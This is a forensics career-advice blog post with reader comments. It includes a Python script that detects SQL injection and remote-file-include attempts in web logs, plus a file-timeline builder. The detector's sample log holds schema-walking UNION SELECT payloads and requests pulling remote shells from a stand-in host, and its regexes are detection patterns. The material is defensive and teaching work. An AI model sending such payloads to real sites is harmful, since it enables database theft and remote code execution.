Friday, December 21, 2012

How Do I Get There From Here - Part 2

So, I have had more folks ask me about a career in Incident Response and Computer Forensics lately, so I thought I would expound a bit on my original post, How Do I Get There From Here.

I think it's worth mentioning again that the thing that will propel you in your career, regardless of what that may be, is sheer desire.  Getting up every day and thinking not that you have to go to work, but that you get to go work doing something you love, makes a huge difference.  I cannot stress that enough.  To be a really good investigator, there is no other way.

Something else that I have recently discovered (thanks to some great Detectives) is that a great skill to have is the ability to spot patterns and anomalies.  So much of what we do in solving cases begins with finding something that just doesn't look right.  You don't have to know exactly what it is, but knowing that something is just off will lead you down the path of taking a deep dive into that "thing", which will either prove or disprove your hypothesis.  Then, Sniper Forensics baby, you either use that finding to guide your investigation further, or you step back, formulate a new hypothesis, and drive on.  But that initial "hrm...what are you?" moment is something you should experience throughout your investigations.

I spoke about this at a conference once, and I was asked, "How do I learn how to spot anomalies?"  Which is a valid question, to which I answered, "By knowing what 'normal' looks like."  You need to put in the chair time.  You need to know what processes should be running, from where, what is common, and why - basically what makes a normal system look normal.  I was a sysadmin for many years before I ever moved into security, which helped me tremendously once I moved into the DFIR world.  If you don't have that background, then virtualization is a great thing.  Fire up some VMs of different operating systems and just look at them.  It sounds boring...but you know...wax on, wax off...

Spotting patterns is a bit different.  It requires you to be able to look at data elements and find similarities in them that could be anomalous.  The best example I can think of is reviewing web logs for IOCs of SQL injection or RFI.  If you have ever seen these attacks in logs before, you know what I am referring to.  You can actually see patterns of the attacker walking the database structure.  If he's using an automated tool to do this, you can spot it a mile away - if you scroll through the logs, it looks like a series of shark fins.  The same holds true for RFI; you can spot the pattern of the attacker trying to get the system to retrieve and include his remote file.  This is also the case for several different kinds of attacks...they have visible patterns that, after you put in some chair time, you can spot.  Again, even if you don't know exactly what you're looking at, you know that it's unique when compared to its surroundings.
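To make the "shark fin" pattern concrete, here is an added example (not the author's tooling; the log lines are constructed, in Apache combined format) that flags SQL injection and RFI indicators in URL-decoded request paths, groups the hits by client IP, and then looks at cadence, which is what gives an automated tool away. The burst thresholds are assumptions you would tune against your own baseline.

```python
"""Spot SQL injection and RFI patterns in web server access logs.

Added example for this post, not the author's own tooling.  The sample
lines are constructed (Apache combined log format) to show one scripted
attacker walking the database schema and one remote file include attempt.
"""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote_plus

SAMPLE_LOG = """\
192.168.1.20 - - [21/Dec/2012:10:00:01 -0700] "GET /index.php?id=7 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.5 - - [21/Dec/2012:10:00:02 -0700] "GET /index.php?id=7%27%20UNION%20SELECT%20table_name,2,3%20FROM%20information_schema.tables%20LIMIT%200,1-- HTTP/1.1" 200 5201 "-" "sqlmap/1.0"
10.0.0.5 - - [21/Dec/2012:10:00:02 -0700] "GET /index.php?id=7%27%20UNION%20SELECT%20table_name,2,3%20FROM%20information_schema.tables%20LIMIT%201,1-- HTTP/1.1" 200 5204 "-" "sqlmap/1.0"
10.0.0.5 - - [21/Dec/2012:10:00:03 -0700] "GET /index.php?id=7%27%20UNION%20SELECT%20column_name,2,3%20FROM%20information_schema.columns%20WHERE%20table_name=%27users%27%20LIMIT%200,1-- HTTP/1.1" 200 5199 "-" "sqlmap/1.0"
10.0.0.5 - - [21/Dec/2012:10:00:03 -0700] "GET /index.php?id=7%27%20UNION%20SELECT%20username,password,3%20FROM%20users%20LIMIT%200,1-- HTTP/1.1" 200 5230 "-" "sqlmap/1.0"
192.168.1.20 - - [21/Dec/2012:10:00:05 -0700] "GET /about.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.0.0.9 - - [21/Dec/2012:10:00:07 -0700] "GET /index.php?page=http://evil.example/c99.txt? HTTP/1.1" 200 5100 "-" "libwww-perl/5.8"
10.0.0.9 - - [21/Dec/2012:10:00:08 -0700] "GET /index.php?page=ftp://evil.example/shell.txt%00 HTTP/1.1" 200 5100 "-" "libwww-perl/5.8"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "[^"]*" "(?P<ua>[^"]*)"$'
)
# Indicators run against the URL-decoded request so %27 / %20 encoding cannot hide them.
SQLI_RE = re.compile(
    r"\bunion\b.*\bselect\b|information_schema|\bsleep\s*\(|\bbenchmark\s*\(|'\s*(?:or|and)\s+\d+\s*=\s*\d+",
    re.IGNORECASE,
)
RFI_RE = re.compile(r"[?&][^=&]+=(?:https?|ftp)://", re.IGNORECASE)


def classify(path):
    """Return 'sqli', 'rfi', or None for one request path."""
    decoded = unquote_plus(path)
    if RFI_RE.search(decoded):
        return "rfi"
    if SQLI_RE.search(decoded):
        return "sqli"
    return None


def parse(log_text):
    """Yield one dict per log line that matches the combined format."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def find_suspicious(log_text):
    """Group flagged requests by client IP: ip -> [(timestamp, label, decoded path), ...]."""
    hits = defaultdict(list)
    for rec in parse(log_text):
        label = classify(rec["path"])
        if label:
            ts = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
            hits[rec["ip"]].append((ts, label, unquote_plus(rec["path"])))
    return dict(hits)


def summarize(hits, burst_min=3, burst_seconds=10):
    """Per-IP summary.  'scripted' flags the machine-gun cadence of an automated
    tool: at least burst_min flagged requests inside burst_seconds (assumed thresholds)."""
    out = {}
    for ip, rows in hits.items():
        rows.sort()
        span = (rows[-1][0] - rows[0][0]).total_seconds()
        out[ip] = {
            "count": len(rows),
            "labels": sorted({r[1] for r in rows}),
            "span_seconds": span,
            "scripted": len(rows) >= burst_min and span <= burst_seconds,
        }
    return out


if __name__ == "__main__":
    hits = find_suspicious(SAMPLE_LOG)
    for ip, info in summarize(hits).items():
        print(f"{ip}: {info}")
        for ts, label, path in hits[ip]:  # read top to bottom: tables -> columns -> users
            print(f"  {ts:%H:%M:%S} {label:4} {path}")
```

Read the decoded paths for 10.0.0.5 top to bottom and the schema walk is right there: information_schema.tables, then information_schema.columns for one table, then the table itself, with only the LIMIT offset changing between neighbouring requests. Two of those inside one second is the fin shape the post describes; a human does not type that fast.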

OK Chris...that's all well and good in theory, but that does not help me find a DFIR job.  Do you have any recommendations that will help me actually get in the door?  Great question...and Yes...yes I do.

OK...Bit of history...when I was a sysadmin at American Express in Phoenix, I used to admin both Windows and *nix servers (Solaris, AIX, and Linux).  It was pretty cool, but kind of boring as it didn't present anything in the way of challenges (at least for me...no offence to Sysadmins...that's my roots!).  So, I started looking into this whole security thing (this was about 2001).  Pentest looked kewl to me.  I knew how to make stuff work...let's see if I can learn how to break into those same systems.  Since I didn't actually have a security job, I couldn't actually DO anything security related at work.  So, I bought a copy of VMware and started playing with tools.  What was Metasploit and what did it do?  What is ARP spoofing...can I do that at home?  Basic research in my home lab.  So, when I finally found an opening and got an interview, I was able to tell the hiring manager that all I had was what I found in the open source community and my home lab, but that I practiced and researched at home.  I read books, blogs, and whitepapers trying to get as much knowledge as I could without actually doing the job.  Well, I got the job for that very reason.

All of that to say this.  If you want a job in DFIR and you are not currently working in DFIR, then research in your home lab.  Take images of your systems, your iPod, your buddies' laptops...whatever, and start to play with the tools of the trade.  Learn how to mount images, create timelines, and parse data on the command line; learn how to use grep, gawk, and cut; use RegRipper to inspect registry hives...etc.  Knowing which tool to use, when, and why is critical!  Remember, I rarely ever use commercial forensics tools.  You can conduct comprehensive investigations without ever spending a dime!
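Creating a timeline is one of the items on that list, so here is an added example of the basic idea behind it (this is not the author's code and it is no substitute for The Sleuth Kit's fls and mactime; the evidence directory and its timestamps are constructed inline so the script runs offline). It walks a tree, records every distinct timestamp per file with MACB flags, and emits the rows oldest first.

```python
"""Build a MACB timeline from file metadata, the way a bodyfile fed to
mactime would.  Added example for this post; not the author's tooling.  The
evidence tree is constructed by make_sample_tree() so the script runs offline.
"""
import os
import tempfile
from datetime import datetime, timezone


def collect_entries(root):
    """Return (epoch_seconds, 'macb' flags, relative path) for every file under root.

    One row per distinct timestamp on the file; the flags mark every clock that
    shares that second, so 'ma..' means modified and accessed together while
    '..c.' is a lone inode change.  st_birthtime (B) only exists on some
    platforms, so B is '.' where the OS does not expose it.
    """
    rows = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            clocks = {"m": int(st.st_mtime), "a": int(st.st_atime), "c": int(st.st_ctime)}
            birth = getattr(st, "st_birthtime", None)
            if birth is not None:
                clocks["b"] = int(birth)
            for ts in sorted(set(clocks.values())):
                flags = "".join(k if clocks.get(k) == ts else "." for k in "macb")
                rows.append((ts, flags, os.path.relpath(path, root)))
    return rows


def timeline(root):
    """Oldest-first lines of the form 'YYYY-MM-DD HH:MM:SS UTC  macb  path'."""
    lines = []
    for ts, flags, rel in sorted(collect_entries(root)):
        when = datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")
        lines.append(f"{when} UTC  {flags}  {rel}")
    return lines


def make_sample_tree():
    """Constructed evidence: three files with back-dated mtime/atime.

    os.utime() can set m and a times, but on POSIX systems ctime is written by
    the kernel and cannot be back-dated from userland, so every file here will
    show a '..c' row at 'now'.  That is the same inconsistency you look for
    when you suspect timestomping: m/a say one thing, c says another.
    """
    root = tempfile.mkdtemp(prefix="timeline_")
    base = 1356091200  # 2012-12-21 12:00:00 UTC, constructed reference point
    for name, mtime in (("notes.txt", base - 400 * 86400),
                        ("report.docx", base - 3600),
                        ("setup.exe", base - 60)):
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write(name)
        os.utime(path, (mtime, mtime))  # (atime, mtime)
    return root


if __name__ == "__main__":
    for line in timeline(make_sample_tree()):
        print(line)
```

On a live system you would point this at a mounted image rather than a temp directory, and you would want deleted and unallocated entries too, which is exactly what fls gives you and a plain os.walk cannot. The value of writing the toy version is that you stop treating the timeline as a black box: you know which clock produced each row and why the c column never agrees with a back-dated file.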

So, when somebody interviews you and you tell them, "I don't do this for a living, but I want to, and here is what I am doing to prepare myself for that," that should speak volumes about the type of employee you would be.  I know for me, you would certainly shoot to the top of my list.

I hope that helps clarify things a bit for those of you who are seeking careers in DFIR.  If there is something you would like me to expand on, or something I mentioned that you would like me to dig deeper into, please let me know!  I am more than happy to help!  After all, I may be interviewing you someday.  It would be great to hear that you read my blog posts and so you did X.

Best of luck to you!


  1. Chris,

    Great post! A great way to go about spotting anomalies is to start by spotting patterns. Taking your "desire" comment a bit further, how many folks run a tool to parse data, as opposed to opening the data source in a hex editor? Corey Harrell's most recent post over on the JourneyintoIR blog is a great example of recognizing patterns and anomalies.

    This also brings to mind your comments from the "Sniper Forensics" presentations regarding "expert eyes". Your graphic of the deer track in the mud really brought it home for me, as my wife and I ride horses in a public park. Knowing what...or who...is out there can be very beneficial. Knowing that deer moved through the area and are likely in our path can keep us alert and help us avoid accidents. The same is true for all manner of DFIR work...knowing what to look for, what can lead you to other things, and what's out of place can make an exam go much more smoothly, and help the examiner avoid getting caught by surprise.

  2. Very good post, and I would have to agree with everything you said. I think it is important to note that you CANNOT shortcut the game. InfoSec, whatever your domain, is supposed to be somewhat of a capstone in Information Security. I don't think it is reasonable to expect to graduate and come out into an InfoSec job. Most of the stories, mine included, meant putting in a lot of time and working your way up as an App Dev, Sys Admin, or Network Admin. Then, someone taking a chance on you because they see the potential. Most importantly, not only you not letting them down, but making their expectations seem whimsical once you've started rolling through.

    There is a certain amount of drive and curiosity. You basically have to not leave things to "wonderment"; get in there and see how and why it does what it does.

  3. Just linked this article on my Facebook account. It's a very interesting article for all.

    Digital Graffiti UK